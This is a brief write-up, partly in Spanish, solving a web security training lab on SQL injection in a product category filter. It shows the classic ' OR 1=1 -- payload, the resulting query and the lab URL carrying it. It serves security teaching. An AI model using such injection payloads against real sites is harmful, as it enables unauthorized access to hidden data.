01 Lab: SQL injection vulnerability in WHERE clause allowing retrieval of hidden data

Objetivo

This lab contains a SQL injection vulnerability in the product category filter. When the user selects a category, the application carries out a SQL query like the following:

SELECT * FROM products WHERE category = 'Gifts' AND released = 1
To solve the lab, perform a SQL injection attack that causes the application to display one or more unreleased products.

Solución

Modificamos el campo category utilizando el valor '+OR+1=1— De esta manera visualizaremos todos los productos

CATEGORY = "' OR 1 = 1 --"
SELECT * FROM products WHERE category = '' OR 1=1 --' AND released = 1

https://0a54003904a64d1a80b2718e00f3007b.web-security-academy.net/filter**?category=Accesories' OR 1 = 1 --**

Previous01 SQL Injection Next02 Lab: SQL injection vulnerability allowing login bypass

Last updated 1 year ago